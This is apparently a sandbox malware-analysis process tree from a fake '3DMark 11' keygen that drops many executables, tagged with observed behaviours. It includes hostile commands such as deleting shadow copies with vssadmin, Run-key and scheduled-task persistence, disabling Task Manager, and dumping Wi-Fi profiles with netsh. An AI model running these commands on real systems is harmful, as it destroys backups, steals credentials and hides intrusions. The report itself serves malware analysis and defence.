- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Roaming\3.exeC:\Users\Admin\AppData\Roaming\3.exe4⤵
- Executes dropped EXE
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\3.exeC:\Users\Admin\AppData\Roaming\3.exe5⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
C:\Users\Admin\AppData\Roaming\4.exeC:\Users\Admin\AppData\Roaming\4.exe4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\4.dll f1 C:\Users\Admin\AppData\Roaming\4.exe@27445⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\4.dll,f06⤵
- Blocklisted process makes network request
-
-
-
-
C:\Users\Admin\AppData\Roaming\5.exeC:\Users\Admin\AppData\Roaming\5.exe4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\6.exeC:\Users\Admin\AppData\Roaming\6.exe4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Users\Admin\AppData\Roaming\7.exeC:\Users\Admin\AppData\Roaming\7.exe4⤵
- Executes dropped EXE
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\8.exeC:\Users\Admin\AppData\Roaming\8.exe4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"5⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"6⤵
- Adds Run key to start application
-
-
-
C:\Users\Admin\AppData\Roaming\feeed.exe"C:\Users\Admin\AppData\Roaming\feeed.exe"5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"6⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\netsh.exe"netsh" wlan show profile7⤵
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\9.exeC:\Users\Admin\AppData\Roaming\9.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wWTxgR" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9AC9.tmp"5⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Roaming\9.exe"{path}"5⤵
-
-
C:\Users\Admin\AppData\Roaming\9.exe"{path}"5⤵
-
-
C:\Users\Admin\AppData\Roaming\9.exe"{path}"5⤵
-
-
C:\Users\Admin\AppData\Roaming\9.exe"{path}"5⤵
-
-
C:\Users\Admin\AppData\Roaming\9.exe"{path}"5⤵
-
C:\Windows\SysWOW64\netsh.exe"netsh" wlan show profile6⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\10.exeC:\Users\Admin\AppData\Roaming\10.exe4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Users\Admin\AppData\Roaming\11.exeC:\Users\Admin\AppData\Roaming\11.exe4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp25B9.tmp"5⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Roaming\11.exe"{path}"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Roaming\12.exeC:\Users\Admin\AppData\Roaming\12.exe4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Users\Admin\AppData\Roaming\13.exeC:\Users\Admin\AppData\Roaming\13.exe4⤵
- Executes dropped EXE
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\13.exeC:\Users\Admin\AppData\Roaming\13.exe5⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"6⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"7⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\14.exeC:\Users\Admin\AppData\Roaming\14.exe4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Users\Admin\AppData\Roaming\15.exeC:\Users\Admin\AppData\Roaming\15.exe4⤵
- Executes dropped EXE
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\16.exeC:\Users\Admin\AppData\Roaming\16.exe4⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops startup file
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: RenamesItself
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"5⤵
-
C:\Windows\system32\mode.commode con cp select=12516⤵
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"5⤵
-
C:\Windows\system32\mode.commode con cp select=12516⤵
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"5⤵
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"5⤵
- Modifies Internet Explorer settings
-
-
-
C:\Users\Admin\AppData\Roaming\17.exeC:\Users\Admin\AppData\Roaming\17.exe4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
C:\Users\Admin\AppData\Roaming\18.exeC:\Users\Admin\AppData\Roaming\18.exe4⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\19.exeC:\Users\Admin\AppData\Roaming\19.exe4⤵
- Executes dropped EXE
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\19.exeC:\Users\Admin\AppData\Roaming\19.exe5⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
C:\Users\Admin\AppData\Roaming\20.exeC:\Users\Admin\AppData\Roaming\20.exe4⤵
- Executes dropped EXE
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\21.exeC:\Users\Admin\AppData\Roaming\21.exe4⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 4765⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3384 -s 5005⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Users\Admin\AppData\Roaming\22.exeC:\Users\Admin\AppData\Roaming\22.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"5⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Users\Admin\AppData\Roaming\23.exeC:\Users\Admin\AppData\Roaming\23.exe4⤵
- Executes dropped EXE
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeC:\Users\Admin\AppData\Roaming\23.exe5⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
C:\Users\Admin\AppData\Roaming\24.exeC:\Users\Admin\AppData\Roaming\24.exe4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Roaming\24.exe"{path}"5⤵
- Drops file in Drivers directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\netsh.exe"netsh" wlan show profile6⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\25.exeC:\Users\Admin\AppData\Roaming\25.exe4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\26.exeC:\Users\Admin\AppData\Roaming\26.exe4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qATVyEXYNcqQZF" /XML "C:\Users\Admin\AppData\Local\Temp\tmp1555.tmp"5⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Roaming\26.exe"{path}"5⤵
-
-
-
C:\Users\Admin\AppData\Roaming\27.exeC:\Users\Admin\AppData\Roaming\27.exe4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Users\Admin\AppData\Roaming\27.exeC:\Users\Admin\AppData\Roaming\27.exe /C5⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exeC:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe5⤵
- Adds Run key to start application
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exeC:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe /C6⤵
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe6⤵
-
-
C:\Windows\SysWOW64\mobsync.exeC:\Windows\SysWOW64\mobsync.exe6⤵
-
-
C:\Windows\SysWOW64\mobsync.exeC:\Windows\SysWOW64\mobsync.exe6⤵
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"6⤵
-
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"6⤵
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe" /W6⤵
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /tn {D67AEED2-E6B3-46A8-A598-592545B18773} /tr "\"C:\Users\Admin\AppData\Roaming\Microsoft\Iarxckfisb\hmwmcj.exe\"" /sc HOURLY /mo 5 /F6⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn axhotbr /tr "\"C:\Users\Admin\AppData\Roaming\27.exe\" /I axhotbr" /SC ONCE /Z /ST 17:28 /ET 17:405⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\28.exeC:\Users\Admin\AppData\Roaming\28.exe4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\29.exeC:\Users\Admin\AppData\Roaming\29.exe4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\29.dll f1 C:\Users\Admin\AppData\Roaming\29.exe@25485⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\29.dll,f06⤵
- Blocklisted process makes network request
-
-
-
-
C:\Users\Admin\AppData\Roaming\30.exeC:\Users\Admin\AppData\Roaming\30.exe4⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\MSBuild.exe"5⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Windows\SysWOW64\REG.exeREG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f6⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" wlan show profile6⤵
-
-
-
-
C:\Users\Admin\AppData\Roaming\31.exeC:\Users\Admin\AppData\Roaming\31.exe4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Users\Admin\Desktop\3DMark 11 Advanced Edition.exe"C:\Users\Admin\Desktop\3DMark 11 Advanced Edition.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen.bat" "3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\intro.exeintro.exe 1O5ZF4⤵
- Modifies system certificate store
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-pr.exekeygen-pr.exe -p83fsase3Ge4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX10\key.exe -txt -scanlocal -file:potato.dat6⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-1.exekeygen-step-1.exe4⤵
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exekeygen-step-2.exe4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-2.exe" >> NUL5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exekeygen-step-3.exe4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-3.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30006⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\keygen-step-4.exekeygen-step-4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX9\002.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX9\002.exe"5⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX9\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX9\Setup.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\sibADCE.tmp\0\setup.exe"C:\Users\Admin\AppData\Local\Temp\sibADCE.tmp\0\setup.exe" -s6⤵
-
C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"7⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"8⤵
- Enumerates connected drives
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\9ku5npt6tedk\aliens.exe"8⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 39⤵
- Runs ping.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX9\jg2_2qua.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX9\jg2_2qua.exe"5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmmon32.exe"C:\Windows\SysWOW64\cmmon32.exe"2⤵
- Adds policy Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Roaming\2.exe"3⤵
-
-
-
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Roaming\18.exe"3⤵
-
-
-
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\autoconv.exe"C:\Windows\SysWOW64\autoconv.exe"2⤵
-
-
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵
-
-
C:\Windows\SysWOW64\cmmon32.exe"C:\Windows\SysWOW64\cmmon32.exe"2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Roaming\11.exe"3⤵
-
-
-
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Program Files (x86)\Zfx4lo\helpqrqlwhj.exe"C:\Program Files (x86)\Zfx4lo\helpqrqlwhj.exe"2⤵
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
C:\Windows\SysWOW64\help.exe"C:\Windows\SysWOW64\help.exe"2⤵
-
-
C:\Windows\SysWOW64\colorcpl.exe"C:\Windows\SysWOW64\colorcpl.exe"2⤵
-
-
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe"2⤵
-
-
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\SysWOW64\ipconfig.exe"2⤵
- Gathers network information
-
-
C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe"C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe"2⤵
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4FE5.tmp"3⤵
- Creates scheduled task(s)
-
-
C:\Program Files (x86)\Zif6hz\regsvcojoduf-.exe"{path}"3⤵
- Suspicious use of SetThreadContext
-
-
-
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\NETSTAT.EXE"C:\Windows\SysWOW64\NETSTAT.EXE"4⤵
- Gathers network information
-
-
-
-
C:\Windows\SysWOW64\autochk.exe"C:\Windows\SysWOW64\autochk.exe"2⤵
-
-
C:\Windows\SysWOW64\autofmt.exe"C:\Windows\SysWOW64\autofmt.exe"2⤵
-
-
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"C:\Program Files (x86)\Lgzhxwx\IconCachenb6h.exe"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\systray.exe"C:\Windows\SysWOW64\systray.exe"2⤵
-
-
C:\Windows\SysWOW64\msdt.exe"C:\Windows\SysWOW64\msdt.exe"2⤵
-
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5201⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {9ED4442B-3F45-4DFB-955D-CC52BE690C72} S-1-5-21-3825035466-2522850611-591511364-1000:EIDQHRRL\Admin:Interactive:[1]1⤵
-
C:\Programdata\RealtekHD\taskhost.exeC:\Programdata\RealtekHD\taskhost.exe2⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\AnLKhBlJfQ" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "Updates\AnLKhBlJfQ" /F5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\AnLKhBlJfQ" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "Updates\AnLKhBlJfQ" /F5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "Updates\qATVyEXYNcqQZF" /F5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\wWTxgR" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "Updates\wWTxgR" /F5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /Delete /TN "Updates\wWTxgR" /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /TN "Updates\wWTxgR" /F5⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns3⤵
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe2⤵
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe2⤵
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe2⤵
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe2⤵
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe2⤵
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe2⤵
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe2⤵
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding C715B638DCD0275E9924148DADA4DC31 C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7149B171DBF515120FD73317ACE2DD0E C2⤵
-
-
